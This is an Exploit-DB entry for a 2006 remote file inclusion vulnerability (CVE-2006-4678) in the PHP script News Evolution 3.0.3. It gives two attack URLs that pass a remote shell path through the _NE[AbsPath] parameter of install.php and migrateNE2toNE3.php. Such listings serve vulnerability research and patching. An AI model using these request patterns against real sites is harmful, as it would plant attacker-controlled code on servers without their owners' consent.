News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion

EDB-ID:

2325

CVE:

2006-4678

EDB Verified:

Author:

ddoshomo

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2006-09-07

Vulnerable App:

# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
# News Evolution v3.0.3 - Remote File Include Vulnerabilities
 
# site    : http://www.comscripts.com/jump.php?action=script&id=825
 
# Script  :  News Evolution v3.0.3
 
# Credits : ERNE
 
# Contact : erne@ernealizm.com  and irc.gigachat.net #kurdhack
 
# Thanks  : BLaCKWHITE, Blackened, Di_lejyoner
 
# Vulnerable :
 
     http://www.site.com/[path]/install.php?_NE[AbsPath]=[shell]
  
     http://www.site.com/[path]/migrateNE2toNE3.php?_NE[AbsPath]=[shell]

# milw0rm.com [2006-09-07]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services